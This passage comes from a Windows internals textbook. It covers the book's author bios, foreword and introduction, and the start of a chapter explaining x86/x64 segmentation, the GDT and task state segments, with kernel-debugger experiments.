advanced persistent threads. In his career, he has worked in various computer
security companies—Italian TgSoft, Saferbytes (now MalwareBytes), and
Talos group of Cisco Systems Inc. He originally joined Microsoft in 2016 as
a security research engineer in the Microsoft Threat Intelligence Center
(MSTIC) group. Since January 2018, Andrea has been a senior core OS
engineer in the Kernel Security Core team of Microsoft, where he mainly
maintains and develops new features (like Retpoline or the Speculation
Mitigations) for the NT and Secure Kernel.
Andrea continues to be active in the security research community, authoring
technical articles on new kernel features of Windows in the Microsoft
Windows Internals blog, and speaking at multiple technical conferences, such
as Recon and Microsoft BlueHat. Follow Andrea on Twitter at @aall86.
ALEX IONESCU is the vice president of endpoint engineering at CrowdStrike,
Inc., where he started as its founding chief architect. Alex is a world-class
security architect and consultant expert in low-level system software, kernel
development, security training, and reverse engineering. Over more than two
decades, his security research work has led to the repair of dozens of critical
security vulnerabilities in the Windows kernel and its related components, as
well as multiple behavioral bugs.
Previously, Alex was the lead kernel developer for ReactOS, an open-source
Windows clone written from scratch, for which he wrote most of the
Windows NT-based subsystems. During his studies in computer science,
Alex worked at Apple on the iOS kernel, boot loader, and drivers on the
original core platform team behind the iPhone, iPad, and AppleTV. Alex is
also the founder of Winsider Seminars & Solutions, Inc., a company that
specializes in low-level system software, reverse engineering, and security
training for various institutions.
Alex continues to be active in the community and has spoken at more than
two dozen events around the world. He offers Windows Internals training,
support, and resources to organizations and individuals worldwide. Follow
Alex on Twitter at @aionescu and his blogs at www.alex-ionescu.com and
www.windows-internals.com/blog.
Foreword
Having used and explored the internals of the wildly successful Windows 3.1
operating system, I immediately recognized the world-changing nature of
Windows NT 3.1 when Microsoft released it in 1993. David Cutler, the
architect and engineering leader for Windows NT, had created a version of
Windows that was secure, reliable, and scalable, but with the same user
interface and ability to run the same software as its older yet more immature
sibling. Helen Custer’s book Inside Windows NT was a fantastic guide to its
design and architecture, but I believed that there was a need for and interest
in a book that went deeper into its working details. VAX/VMS Internals and
Data Structures, the definitive guide to David Cutler’s previous creation, was
a book as close to source code as you could get with text, and I decided that I
was going to write the Windows NT version of that book.
Progress was slow. I was busy finishing my PhD and starting a career at a
small software company. To learn about Windows NT, I read documentation,
reverse-engineered its code, and wrote systems monitoring tools like Regmon
and Filemon that helped me understand the design by coding them and using
them to observe the under-the-hood views they gave me of Windows NT’s
operation. As I learned, I shared my newfound knowledge in a monthly “NT
Internals” column in Windows NT Magazine, the magazine for Windows NT
administrators. Those columns would serve as the basis for the chapter-
length versions that I’d publish in Windows Internals, the book I’d contracted
to write with IDG Press.
My book deadlines came and went because my book writing was further
slowed by my full-time job and time I spent writing Sysinternals (then
NTInternals) freeware and commercial software for Winternals Software, my
startup. Then, in 1996, I had a shock when Dave Solomon published Inside
Windows NT, 2nd Edition. I found the book both impressive and depressing.
A complete rewrite of the Helen’s book, it went deeper and broader into the
internals of Windows NT like I was planning on doing, and it incorporated
novel labs that used built-in tools and diagnostic utilities from the Windows
NT Resource Kit and Device Driver Development Kit (DDK) to demonstrate
key concepts and behaviors. He’d raised the bar so high that I knew that
writing a book that matched the quality and depth he’d achieved was even
more monumental than what I had planned.
As the saying goes, if you can’t beat them, join them. I knew Dave from
the Windows conference speaking circuit, so within a couple of weeks of the
book’s publication I sent him an email proposing that I join him to coauthor
the next edition, which would document what was then called Windows NT
5 and would eventually be renamed as Windows 2000. My contribution
would be new chapters based on my NT Internals column about topics Dave
hadn’t included, and I’d also write about new labs that used my Sysinternals
tools. To sweeten the deal, I suggested including the entire collection of
Sysinternals tools on a CD that would accompany the book—a common way
to distribute software with books and magazines.
Dave was game. First, though, he had to get approval from Microsoft. I
had caused Microsoft some public relations complications with my public
revelations that Windows NT Workstation and Windows NT Server were the
same exact code with different behaviors based on a Registry setting. And
while Dave had full Windows NT source access, I didn’t, and I wanted to
keep it that way so as not to create intellectual property issues with the
software I was writing for Sysinternals or Winternals, which relied on
undocumented APIs. The timing was fortuitous because by the time Dave
asked Microsoft, I’d been repairing my relationship with key Windows
engineers, and Microsoft tacitly approved.
Writing Inside Windows 2000 with Dave was incredibly fun. Improbably
and completely coincidentally, he lived about 20 minutes from me (I lived in
Danbury, Connecticut and he lived in Sherman, Connecticut). We’d visit
each other’s houses for marathon writing sessions where we’d explore the
internals of Windows together, laugh at geeky jokes and puns, and pose
technical questions that would pit him and me in races to find the answer
with him scouring source code while I used a disassembler, debugger, and
Sysinternals tools. (Don’t rub it in if you talk to him, but I always won.)
Thus, I became a coauthor to the definitive book describing the inner
workings of one of the most commercially successful operating systems of
all time. We brought in Alex Ionescu to contribute to the fifth edition, which
covered Windows XP and Windows Vista. Alex is among the best reverse
engineers and operating systems experts in the world, and he added both
breadth and depth to the book, matching or exceeding our high standards for
legibility and detail. The increasing scope of the book, combined with
Windows itself growing with new capabilities and subsystems, resulted in the
6th Edition exceeding the single-spine publishing limit we’d run up against
with the 5th Edition, so we split it into two volumes.
I had already moved to Azure when writing for the sixth edition got
underway, and by the time we were ready for the seventh edition, I no longer
had time to contribute to the book. Dave Solomon had retired, and the task of
updating the book became even more challenging when Windows went from
shipping every few years with a major release and version number to just
being called Windows 10 and releasing constantly with feature and
functionality upgrades. Pavel Yosifovitch stepped in to help Alex with Part 1,
but he too became busy with other projects and couldn’t contribute to Part 2.
Alex was also busy with his startup CrowdStrike, so we were unsure if there
would even be a Part 2.
Fortunately, Andrea came to the rescue. He and Alex have updated a broad
swath of the system in Part 2, including the startup and shutdown process,
Registry subsystem, and UWP. Not just content to provide a refresh, they’ve
also added three new chapters that detail Hyper-V, caching and file systems,
and diagnostics and tracing. The legacy of the Windows Internals book series
being the most technically deep and accurate word on the inner workings on
Windows, one of the most important software releases in history, is secure,
and I’m proud to have my name still listed on the byline.
A memorable moment in my career came when we asked David Cutler to
write the foreword for Inside Windows 2000. Dave Solomon and I had visited
Microsoft a few times to meet with the Windows engineers and had met
David on a few of the trips. However, we had no idea if he’d agree, so were
thrilled when he did. It’s a bit surreal to now be on the other side, in a similar
position to his when we asked David, and I’m honored to be given the
opportunity. I hope the endorsement my foreword represents gives you the
same confidence that this book is authoritative, clear, and comprehensive as
David Cutler’s did for buyers of Inside Windows 2000.
Mark Russinovich
Azure Chief Technology Officer and Technical Fellow
Microsoft
March 2021
Bellevue, Washington
Introduction
Windows Internals, Seventh Edition, Part 2 is intended for advanced
computer professionals (developers, security researchers, and system
administrators) who want to understand how the core components of the
Microsoft Windows 10 (up to and including the May 2021 Update, a.k.a.
21H1) and Windows Server (from Server 2016 up to Server 2022) operating
systems work internally, including many components that are shared with
Windows 11X and the Xbox Operating System.
With this knowledge, developers can better comprehend the rationale
behind design choices when building applications specific to the Windows
platform and make better decisions to create more powerful, scalable, and
secure software. They will also improve their skills at debugging complex
problems rooted deep in the heart of the system, all while learning about
tools they can use for their benefit.
System administrators can leverage this information as well because
understanding how the operating system works “under the hood” facilitates
an understanding of the expected performance behavior of the system. This
makes troubleshooting system problems much easier when things go wrong
and empowers the triage of critical issues from the mundane.
Finally, security researchers can figure out how software applications and
the operating system can misbehave and be misused, causing undesirable
behavior, while also understanding the mitigations and security features
offered by modern Windows systems against such scenarios. Forensic
experts can learn which data structures and mechanisms can be used to find
signs of tampering, and how Windows itself detects such behavior.
Whoever the reader might be, after reading this book, they will have a
better understanding of how Windows works and why it behaves the way it
does.
History of the book
This is the seventh edition of a book that was originally called Inside
Windows NT (Microsoft Press, 1992), written by Helen Custer (prior to the
initial release of Microsoft Windows NT 3.1). Inside Windows NT was the
first book ever published about Windows NT and provided key insights into
the architecture and design of the system. Inside Windows NT, Second
Edition (Microsoft Press, 1998) was written by David Solomon. It updated
the original book to cover Windows NT 4.0 and had a greatly increased level
of technical depth.
Inside Windows 2000, Third Edition (Microsoft Press, 2000) was authored
by David Solomon and Mark Russinovich. It added many new topics, such as
startup and shutdown, service internals, registry internals, file-system drivers,
and networking. It also covered kernel changes in Windows 2000, such as the
Windows Driver Model (WDM), Plug and Play, power management,
Windows Management Instrumentation (WMI), encryption, the job object,
and Terminal Services. Windows Internals, Fourth Edition (Microsoft Press,
2004) was the Windows XP and Windows Server 2003 update and added
more content focused on helping IT professionals make use of their
knowledge of Windows internals, such as using key tools from Windows
SysInternals and analyzing crash dumps.
Windows Internals, Fifth Edition (Microsoft Press, 2009) was the update
for Windows Vista and Windows Server 2008. It saw Mark Russinovich
move on to a full-time job at Microsoft (where he is now the Azure CTO)
and the addition of a new co-author, Alex Ionescu. New content included the
image loader, user-mode debugging facility, Advanced Local Procedure Call
(ALPC), and Hyper-V. The next release, Windows Internals, Sixth Edition
(Microsoft Press, 2012), was fully updated to address the many kernel
changes in Windows 7 and Windows Server 2008 R2, with many new hands-
on experiments to reflect changes in the tools as well.
Seventh edition changes
The sixth edition was also the first to split the book into two parts, due to the
length of the manuscript having exceeded modern printing press limits. This
also had the benefit of allowing the authors to publish parts of the book more
quickly than others (March 2012 for Part 1, and September 2012 for Part 2).
At the time, however, this split was purely based on page counts, with the
same overall chapters returning in the same order as prior editions.
After the sixth edition, Microsoft began a process of OS convergence,
which first brought together the Windows 8 and Windows Phone 8 kernels,
and eventually incorporated the modern application environment in Windows
8.1, Windows RT, and Windows Phone 8.1. The convergence story was
complete with Windows 10, which runs on desktops, laptops, cell phones,
servers, Xbox One, HoloLens, and various Internet of Things (IoT) devices.
With this grand unification completed, the time was right for a new edition of
the series, which could now finally catch up with almost half a decade of
changes.
With the seventh edition (Microsoft Press, 2017), the authors did just that,
joined for the first time by Pavel Yosifovich, who took over David
Solomon’s role as the “Microsoft insider” and overall book manager.
Working alongside Alex Ionescu, who like Mark, had moved on to his own
full-time job at CrowdStrike (where is now the VP of endpoint engineering),
Pavel made the decision to refactor the book’s chapters so that the two parts
could be more meaningfully cohesive manuscripts instead of forcing readers
to wait for Part 2 to understand concepts introduced in Part 1. This allowed
Part 1 to stand fully on its own, introducing readers to the key concepts of
Windows 10’s system architecture, process management, thread scheduling,
memory management, I/O handling, plus user, data, and platform security.
Part 1 covered aspects of Windows 10 up to and including Version 1703, the
May 2017 Update, as well as Windows Server 2016.
Changes in Part 2
With Alex Ionescu and Mark Russinovich consumed by their full-time jobs,
and Pavel moving on to other projects, Part 2 of this edition struggled for
many years to find a champion. The authors are grateful to Andrea Allievi for
having eventually stepped up to carry on the mantle and complete the series.
Working with advice and guidance from Alex, but with full access to
Microsoft source code as past coauthors had and, for the first time, being a
full-fledged developer in the Windows Core OS team, Andrea turned the
book around and brought his own vision to the series.
Realizing that chapters on topics such as networking and crash dump
analysis were beyond today’s readers’ interests, Andrea instead added
exciting new content around Hyper-V, which is now a key part of the
Windows platform strategy, both on Azure and on client systems. This
complements fully rewritten chapters on the boot process, on new storage
technologies such as ReFS and DAX, and expansive updates on both system
and management mechanisms, alongside the usual hands-on experiments,
which have been fully updated to take advantage of new debugger
technologies and tooling.
The long delay between Parts 1 and 2 made it possible to make sure the
book was fully updated to cover the latest public build of Windows 10,
Version 2103 (May 2021 Update / 21H1), including Windows Server 2019
and 2022, such that readers would not be “behind” after such a long gap long
gap. As Windows 11 builds upon the foundation of the same operating
system kernel, readers will be adequately prepared for this upcoming version
as well.
Hands-on experiments
Even without access to the Windows source code, you can glean much about
Windows internals from the kernel debugger, tools from SysInternals, and the
tools developed specifically for this book. When a tool can be used to expose
or demonstrate some aspect of the internal behavior of Windows, the steps
for trying the tool yourself are listed in special “EXPERIMENT” sections.
These appear throughout the book, and we encourage you to try them as
you’re reading. Seeing visible proof of how Windows works internally will
make much more of an impression on you than just reading about it will.
Topics not covered
Windows is a large and complex operating system. This book doesn’t cover
everything relevant to Windows internals but instead focuses on the base
system components. For example, this book doesn’t describe COM+, the
Windows distributed object-oriented programming infrastructure, or the
Microsoft .NET Framework, the foundation of managed code applications.
Because this is an “internals” book and not a user, programming, or system
administration book, it doesn’t describe how to use, program, or configure
Windows.
A warning and a caveat
Because this book describes undocumented behavior of the internal
architecture and the operation of the Windows operating system (such as
internal kernel structures and functions), this content is subject to change
between releases. By “subject to change,” we don’t necessarily mean that
details described in this book will change between releases, but you can’t
count on them not changing. Any software that uses these undocumented
interfaces, or insider knowledge about the operating system, might not work
on future releases of Windows. Even worse, software that runs in kernel
mode (such as device drivers) and uses these undocumented interfaces might
experience a system crash when running on a newer release of Windows,
resulting in potential loss of data to users of such software.
In short, you should never use any internal Windows functionality, registry
key, behavior, API, or other undocumented detail mentioned in this book
during the development of any kind of software designed for end-user
systems or for any other purpose other than research and documentation.
Always check with the Microsoft Software Development Network (MSDN)
for official documentation on a particular topic first.
Assumptions about you
The book assumes the reader is comfortable with working on Windows at a
power-user level and has a basic understanding of operating system and
hardware concepts, such as CPU registers, memory, processes, and threads.
Basic understanding of functions, pointers, and similar C programming
language constructs is beneficial in some sections.
Organization of this book
The book is divided into two parts (as was the sixth edition), the second of
which you’re holding in your hands.
■ Chapter 8, “System mechanisms,” provides information about the
important internal mechanisms that the operating system uses to
provide key services to device drivers and applications, such as
ALPC, the Object Manager, and synchronization routines. It also
includes details about the hardware architecture that Windows runs
on, including trap processing, segmentation, and side channel
vulnerabilities, as well as the mitigations required to address them.
■ Chapter 9, “Virtualization technologies,” describes how the Windows
OS uses the virtualization technologies exposed by modern processors
to allow users to create and use multiple virtual machines on the same
system. Virtualization is also extensively used by Windows to provide
a new level of security. Thus, the Secure Kernel and Isolated User
Mode are extensively discussed in this chapter.
■ Chapter 10, “Management, diagnostics, and tracing,” details the
fundamental mechanisms implemented in the operating system for
management, configuration, and diagnostics. In particular, the
Windows registry, Windows services, WMI, and Task Scheduling are
introduced along with diagnostics services like Event Tracing for
Windows (ETW) and DTrace.
■ Chapter 11, “Caching and file systems,” shows how the most
important “storage” components, the cache manager and file system
drivers, interact to provide to Windows the ability to work with files,
directories, and disk devices in an efficient and fault-safe way. The
chapter also presents the file systems that Windows supports, with
particular detail on NTFS and ReFS.
■ Chapter 12, “Startup and shutdown,” describes the flow of operations
that occurs when the system starts and shuts down, and the operating
system components that are involved in the boot flow. The chapter
also analyzes the new technologies brought on by UEFI, such as
Secure Boot, Measured Boot, and Secure Launch.
Conventions
The following conventions are used in this book:
■ Boldface type is used to indicate text that you type as well as
interface items that you are instructed to click or buttons that you are
instructed to press.
■ Italic type is used to indicate new terms.
■ Code elements appear in italics or in a monospaced font, depending
on context.
■ The first letters of the names of dialog boxes and dialog box elements
are capitalized—for example, the Save As dialog box.
■ Keyboard shortcuts are indicated by a plus sign (+) separating the key
names. For example, Ctrl+Alt+Delete means that you press the Ctrl,
Alt, and Delete keys at the same time.
About the companion content
We have included companion content to enrich your learning experience.
You can download the companion content for this book from the following
page:
MicrosoftPressStore.com/WindowsInternals7ePart2/downloads
Acknowledgments
The book contains complex technical details, as well as their reasoning,
which are often hard to describe and understand from an outsider’s
perspective. Throughout its history, this book has always had the benefit of
both proving an outsider’s reverse-engineering view as well as that of an
internal Microsoft contractor or employee to fill in the gaps and to provide
access to the vast swath of knowledge that exists within the company and the
rich development history behind the Windows operating system. For this
Seventh Edition, Part 2, the authors are grateful to Andrea Allievi for having
joined as a main author and having helped spearhead most of the book and its
updated content.
Apart from Andrea, this book wouldn’t contain the depth of technical
detail or the level of accuracy it has without the review, input, and support of
key members of the Windows development team, other experts at Microsoft,
and other trusted colleagues, friends, and experts in their own domains.
It is worth noting that the newly written Chapter 9, “Virtualization
technologies” wouldn’t have been so complete and detailed without the help
of Alexander Grest and Jon Lange, who are world-class subject experts and
deserve a special thanks, in particular for the days that they spent helping
Andrea understand the inner details of the most obscure features of the
hypervisor and the Secure Kernel.
Alex would like to particularly bring special thanks to Arun Kishan,
Mehmet Iyigun, David Weston, and Andy Luhrs, who continue to be
advocates for the book and Alex’s inside access to people and information to
increase the accuracy and completeness of the book.
Furthermore, we want to thank the following people, who provided
technical review and/or input to the book or were simply a source of support
and help to the authors: Saar Amar, Craig Barkhouse, Michelle Bergeron, Joe
Bialek, Kevin Broas, Omar Carey, Neal Christiansen, Chris Fernald, Stephen
Finnigan, Elia Florio, James Forshaw, Andrew Harper, Ben Hillis, Howard
Kapustein, Saruhan Karademir, Chris Kleynhans, John Lambert, Attilio
Mainetti, Bill Messmer, Matt Miller, Jake Oshins, Simon Pope, Jordan Rabet,
Loren Robinson, Arup Roy, Yarden Shafir, Andrey Shedel, Jason Shirk,
Axel Souchet, Atul Talesara, Satoshi Tanda, Pedro Teixeira, Gabrielle Viala,
Nate Warfield, Matthew Woolman, and Adam Zabrocki.
We continue to thank Ilfak Guilfanov of Hex-Rays (http://www.hex-
rays.com) for the IDA Pro Advanced and Hex-Rays licenses granted to Alex
Ionescu, including most recently a lifetime license, which is an invaluable
tool for speeding up the reverse engineering of the Windows kernel. The
Hex-Rays team continues to support Alex’s research and builds relevant new
decompiler features in every release, which make writing a book such as this
possible without source code access.
Finally, the authors would like to thank the great staff at Microsoft Press
(Pearson) who have been behind turning this book into a reality. Loretta
Yates, Charvi Arora, and their support staff all deserve a special mention for
their unlimited patience from turning a contract signed in 2018 into an actual
book two and a half years later.
Errata and book support
We’ve made every effort to ensure the accuracy of this book and its
companion content. You can access updates to this book—in the form of a
list of submitted errata and their related corrections at
MicrosoftPressStore.com/WindowsInternals7ePart2/errata
If you discover an error that is not already listed, please submit it to us at
the same page.
For additional book support and information, please visit
http://www.MicrosoftPressStore.com/Support.
Please note that product support for Microsoft software and hardware is
not offered through the previous addresses. For help with Microsoft software
or hardware, go to
http://support.microsoft.com.
Stay in touch
Let’s keep the conversation going! We’re on Twitter: @MicrosoftPress.
CHAPTER 8
System mechanisms
The Windows operating system provides several base mechanisms that
kernel-mode components such as the executive, the kernel, and device drivers
use. This chapter explains the following system mechanisms and describes
how they are used:
■ Processor execution model, including ring levels, segmentation, task
states, trap dispatching, including interrupts, deferred procedure calls
(DPCs), asynchronous procedure calls (APCs), timers, system worker
threads, exception dispatching, and system service dispatching
■ Speculative execution barriers and other software-side channel
mitigations
■ The executive Object Manager
■ Synchronization, including spinlocks, kernel dispatcher objects, wait
dispatching, and user-mode-specific synchronization primitives such
as address-based waits, conditional variables, and slim reader-writer
(SRW) locks
■ Advanced Local Procedure Call (ALPC) subsystem
■ Windows Notification Facility (WNF)
■ WoW64
■ User-mode debugging framework
Additionally, this chapter also includes detailed information on the
Universal Windows Platform (UWP) and the set of user-mode and kernel-
mode services that power it, such as the following:
■ Packaged Applications and the AppX Deployment Service
■ Centennial Applications and the Windows Desktop Bridge
■ Process State Management (PSM) and the Process Lifetime Manager
(PLM)
■ Host Activity Moderator (HAM) and Background Activity Moderator
(BAM)
Processor execution model
This section takes a deep look at the internal mechanics of Intel i386–based
processor architecture and its extension, the AMD64-based architecture used
on modern systems. Although the two respective companies first came up
with these designs, it’s worth noting that both vendors now implement each
other’s designs, so although you may still see these suffixes attached to
Windows files and registry keys, the terms x86 (32-bit) and x64 (64-bit) are
more common in today’s usage.
We discuss concepts such as segmentation, tasks, and ring levels, which
are critical mechanisms, and we discuss the concept of traps, interrupts, and
system calls.
Segmentation
High-level programming languages such as C/C++ and Rust are compiled
down to machine-level code, often called assembler or assembly code. In this
low-level language, processor registers are accessed directly, and there are
often three primary types of registers that programs access (which are visible
when debugging code):
■ The Program Counter (PC), which in x86/x64 architecture is called
the Instruction Pointer (IP) and is represented by the EIP (x86) and
RIP (x64) register. This register always points to the line of assembly
code that is executing (except for certain 32-bit ARM architectures).
■ The Stack Pointer (SP), which is represented by the ESP (x86) and
RSP (x64) register. This register points to the location in memory that
is holding the current stack location.
■ Other General Purpose Registers (GPRs) include registers such as
EAX/RAX, ECX/RCX, EDX/RDX, ESI/RSI and R8, R14, just to
name a few examples.
Although these registers can contain address values that point to memory,
additional registers are involved when accessing these memory locations as
part of a mechanism called protected mode segmentation. This works by
checking against various segment registers, also called selectors:
■ All accesses to the program counter are first verified by checking
against the code segment (CS) register.
■ All accesses to the stack pointer are first verified by checking against
the stack segment (SS) register.
■ Accesses to other registers are determined by a segment override,
which encoding can be used to force checking against a specific
register such as the data segment (DS), extended segment (ES), or F
segment (FS).
These selectors live in 16-bit segment registers and are looked up in a data
structure called the Global Descriptor Table (GDT). To locate the GDT, the
processor uses yet another CPU register, the GDT Register, or GDTR. The
format of these selectors is as shown in Figure 8-1.
Figure 8-1 Format of an x86 segment selector.
The offset located in the segment selector is thus looked up in the GDT,
unless the TI bit is set, in which case a different structure, the Local
Descriptor Table is used, which is identified by the LDTR register instead
and is not used anymore in the modern Windows OS. The result is in a
segment entry being discovered—or alternatively, an invalid entry, which
will issue a General Protection Fault (#GP) or Segment Fault (#SF)
exception.
This entry, called segment descriptor in modern operating systems, serves
two critical purposes:
■ For a code segment, it indicates the ring level, also called the Code
Privilege Level (CPL) at which code running with this segment
selector loaded will execute. This ring level, which can be from 0 to
3, is then cached in the bottom two bits of the actual selector, as was
shown in Figure 8-1. Operating systems such as Windows use Ring 0
to run kernel mode components and drivers, and Ring 3 to run
applications and services.
Furthermore, on x64 systems, the code segment also indicates
whether this is a Long Mode or Compatibility Mode segment. The
former is used to allow the native execution of x64 code, whereas the
latter activates legacy compatibility with x86. A similar mechanism
exists on x86 systems, where a segment can be marked as a 16-bit
segment or a 32-bit segment.
■ For other segments, it indicates the ring level, also called the
Descriptor Privilege Level (DPL), that is required to access this
segment. Although largely an anachronistic check in today’s modern
systems, the processor still enforces (and applications still expect) this
to be set up correctly.
Finally, on x86 systems, segment entries can also have a 32-bit base
address, which will add that value to any value already loaded in a register
that is referencing this segment with an override. A corresponding segment
limit is then used to check if the underlying register value is beyond a fixed
cap. Because this base address was set to 0 (and limit to 0xFFFFFFFF) on
most operating systems, the x64 architecture does away with this concept,
apart from the FS and GS selectors, which operate a little bit differently:
■ If the Code Segment is a Long Mode code segment, then get the base
address for the FS segment from the FS_BASE Model Specific
Register (MSR)—0C0000100h. For the GS segment, look at the
current swap state, which can be modified with the swapgs
instruction, and load either the GS_BASE MSR—0C0000101h or the
GS_SWAP MSR—0C0000102h.
If the TI bit is set in the FS or GS segment selector register, then get
its value from the LDT entry at the appropriate offset, which is
limited to a 32-bit base address only. This is done for compatibility
reasons with certain operating systems, and the limit is ignored.
■ If the Code Segment is a Compatibility Mode segment, then read the
base address as normal from the appropriate GDT entry (or LDT entry
if the TI bit is set). The limit is enforced and validated against the
offset in the register following the segment override.
This interesting behavior of the FS and GS segments is used by operating
systems such as Windows to achieve a sort of thread-local register effect,
where specific data structures can be pointed to by the segment base address,
allowing simple access to specific offsets/fields within it.
For example, Windows stores the address of the Thread Environment
Block (TEB), which was described in Part 1, Chapter 3, “Processes and
jobs,” in the FS segment on x86 and in the GS (swapped) segment on x64.
Then, while executing kernel-mode code on x86 systems, the FS segment is
manually modified to a different segment entry that contains the address of
the Kernel Processor Control Region (KPCR) instead, whereas on x64, the
GS (non-swapped) segment stores this address.
Therefore, segmentation is used to achieve these two effects on Windows
—encode and enforce the level of privilege that a piece of code can execute
with at the processor level and provide direct access to the TEB and KPCR
data structures from user-mode and/or kernel-mode code, as appropriate.
Note that since the GDT is pointed to by a CPU register—the GDTR—each
CPU can have its own GDT. In fact, this is exactly what Windows uses to
make sure the appropriate per-processor KPCR is loaded for each GDT, and
that the TEB of the currently executing thread on the current processor is
equally present in its segment.
EXPERIMENT: Viewing the GDT on an x64 system
You can view the contents of the GDT, including the state of all
segments and their base addresses (when relevant) by using the dg
debugger command, if you are doing remote debugging or
analyzing a crash dump (which is also the case when using
LiveKD). This command accepts the starting segment and the
ending segment, which will be 10 and 50 in this example:
Click here to view code image
0: kd> dg 10 50
P Si Gr
Pr Lo
Sel Base Limit Type l ze an
es ng Flags
---- ----------------- ----------------- ---------- - -- --
-- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By
P Lo 0000029b
0018 00000000`00000000 00000000`00000000 Data RW Ac 0 Bg By
P Nl 00000493
0020 00000000`00000000 00000000`ffffffff Code RE Ac 3 Bg Pg
P Nl 00000cfb
0028 00000000`00000000 00000000`ffffffff Data RW Ac 3 Bg Pg
P Nl 00000cf3
0030 00000000`00000000 00000000`00000000 Code RE Ac 3 Nb By
P Lo 000002fb
0050 00000000`00000000 00000000`00003c00 Data RW Ac 3 Bg By
P Nl 000004f3
The key segments here are 10h, 18h, 20h, 28h, 30h, and 50h.
(This output was cleaned up a bit to remove entries that are not
relevant to this discussion.)
At 10h (KGDT64_R0_CODE), you can see a Ring 0 Long Mode
code segment, identified by the number 0 under the Pl column , the
letters “Lo” under the Long column, and the type being Code RE.
Similarly, at 20h (KGDT64_R3_CMCODE), you’ll note a Ring 3
Nl segment (not long—i.e., compatibility mode), which is the
segment used for executing x86 code under the WoW64
subsystem, while at 30h (KGDT64_R3_CODE), you’ll find an
equivalent Long Mode segment. Next, note the 18h
(KGDT64_R0_DATA) and 28h (KGDT64_R3_DATA) segments,
which correspond to the stack, data, and extended segment.
There’s one last segment at 50h (KGDT_R3_CMTEB), which
typically has a base address of zero, unless you’re running some
x86 code under WoW64 while dumping the GDT. This is where
the base address of the TEB will be stored when running under
compatibility mode, as was explained earlier.
To see the 64-bit TEB and KPCR segments, you’d have to dump
the respective MSRs instead, which can be done with the following
commands if you are doing local or remote kernel debugging (these
commands will not work with a crash dump):
Click here to view code image
lkd> rdmsr c0000101
msr[c0000101] = ffffb401`a3b80000
lkd> rdmsr c0000102
msr[c0000102] = 000000e5`6dbe9000
You can compare these values with those of @$pcr and @$teb,
which should show you the same values, as below:
Click here to view code image
lkd> dx -r0 @$pcr
@$pcr : 0xffffb401a3b80000 [Type: _KPCR *]
lkd> dx -r0 @$teb
@$teb : 0xe56dbe9000 [Type: _TEB *]
EXPERIMENT: Viewing the GDT on an x86 system
On an x86 system, the GDT is laid out with similar segments, but at
different selectors, additionally, due to usage of a dual FS segment
instead of the swapgs functionality, and due to the lack of Long
Mode, the number of selectors is a little different, as you can see
here:
Click here to view code image
kd> dg 8 38
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0008 00000000 ffffffff Code RE Ac 0 Bg Pg P Nl 00000c9b
0010 00000000 ffffffff Data RW Ac 0 Bg Pg P Nl 00000c93
0018 00000000 ffffffff Code RE 3 Bg Pg P Nl 00000cfa
0020 00000000 ffffffff Data RW Ac 3 Bg Pg P Nl 00000cf3
0030 80a9e000 00006020 Data RW Ac 0 Bg By P Nl 00000493
0038 00000000 00000fff Data RW 3 Bg By P Nl 000004f2
The key segments here are 8h, 10h, 18h, 20h, 30h, and 38h. At
08h (KGDT_R0_CODE), you can see a Ring 0 code segment.
Similarly, at 18h (KGDT_R3_CODE), note a Ring 3 segment.
Next, note the 10h (KGDT_R0_DATA) and 20h
(KGDT_R3_DATA) segments, which correspond to the stack,
data, and extended segment.
On x86, you’ll find at segment 30h (KGDT_R0_PCR) the base
address of the KPCR, and at segment 38h (KGDT_R3_TEB), the
base address of the current thread’s TEB. There are no MSRs used
for segmentation on these systems.
Lazy segment loading
Based on the description and values of the segments described earlier, it may
be surprising to investigate the values of DS and ES on an x86 and/or x64
system and find that they do not necessarily match the defined values for
their respective ring levels. For example, an x86 user-mode thread would
have the following segments:
CS = 1Bh (18h | 3)
ES, DS = 23 (20h | 3)
FS = 3Bh (38h | 3)
Yet, during a system call in Ring 0, the following segments would be
found:
CS = 08h (08h | 0)
ES, DS = 23 (20h | 3)
FS = 30h (30h | 0)
Similarly, an x64 thread executing in kernel mode would also have its ES
and DS segments set to 2Bh (28h | 3). This discrepancy is due to a feature
known as lazy segment loading and reflects the meaninglessness of the
Descriptor Privilege Level (DPL) of a data segment when the current Code
Privilege Level (CPL) is 0 combined with a system operating under a flat
memory model. Since a higher CPL can always access data of a lower DPL
—but not the contrary—setting DS and/or ES to their “proper” values upon
entering the kernel would also require restoring them when returning to user
mode.
Although the MOV DS, 10h instruction seems trivial, the processor’s
microcode needs to perform a number of selector correctness checks when
encountering it, which would add significant processing costs to system call
and interrupt handling. As such, Windows always uses the Ring 3 data
segment values, avoiding these associated costs.
Task state segments
Other than the code and data segment registers, there is an additional special
register on both x86 and x64 architectures: the Task Register (TR), which is
also another 16-bit selector that acts as an offset in the GDT. In this case,
however, the segment entry is not associated with code or data, but rather
with a task. This represents, to the processor’s internal state, the current
executing piece of code, which is called the Task State—in the case of
Windows, the current thread. These task states, represented by segments
(Task State Segment, or TSS), are used in modern x86 operating systems to
construct a variety of tasks that can be associated with critical processor traps
(which we’ll see in the upcoming section). At minimum, a TSS represents a
page directory (through the CR3 register), such as a PML4 on x64 systems
(see Part 1, Chapter 5, “Memory management,” for more information on
paging), a Code Segment, a Stack Segment, an Instruction Pointer, and up to
four Stack Pointers (one for each ring level). Such TSSs are used in the
following scenarios:
■ To represent the current execution state when there is no specific trap
occurring. This is then used by the processor to correctly handle
interrupts and exceptions by loading the Ring 0 stack from the TSS if
the processor was currently running in Ring 3.
■ To work around an architectural race condition when dealing with
Debug Faults (#DB), which requires a dedicated TSS with a custom
debug fault handler and kernel stack.
■ To represent the execution state that should be loaded when a Double
Fault (#DF) trap occurs. This is used to switch to the Double Fault
handler on a safe (backup) kernel stack instead of the current thread’s
kernel stack, which may be the reason why a fault has happened.
■ To represent the execution state that should be loaded when a Non
Maskable Interrupt (#NMI) occurs. Similarly, this is used to load the
NMI handler on a safe kernel stack.
■ Finally, to a similar task that is also used during Machine Check
Exceptions (#MCE), which, for the same reasons, can run on a
dedicated, safe, kernel stack.
On x86 systems, you’ll find the main (current) TSS at selector 028h in the
GDT, which explains why the TR register will be 028h during normal
Windows execution. Additionally, the #DF TSS is at 58h, the NMI TSS is at
50h, and the #MCE TSS is at 0A0h. Finally, the #DB TSS is at 0A8h.
On x64 systems, the ability to have multiple TSSs was removed because the
functionality had been relegated to mostly this one need of executing trap
